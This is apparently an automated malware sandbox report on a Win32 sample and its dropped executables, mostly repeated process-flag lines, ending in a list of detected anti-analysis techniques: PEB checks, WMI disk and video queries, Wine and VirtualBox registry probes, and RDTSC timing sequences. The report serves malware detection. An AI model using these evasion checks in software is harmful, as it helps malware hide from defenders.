                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-9170
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-10523
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_14-12123
                              Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Tries to detect sandboxes / dynamic malware analysis system (registry check)
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Tries to detect virtualization through RDTSC time measurements
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D562D6 second address: D562DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D562DE second address: D562E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D562E3 second address: D562E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D562E9 second address: D562ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D6484F second address: D64855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D64855 second address: D6485D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D64B36 second address: D64B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D64B4B second address: D64B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D64B51 second address: D64B7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FC734E5F776h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FC734E5F781h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC734E5F77Dh 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D64CB5 second address: D64CBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
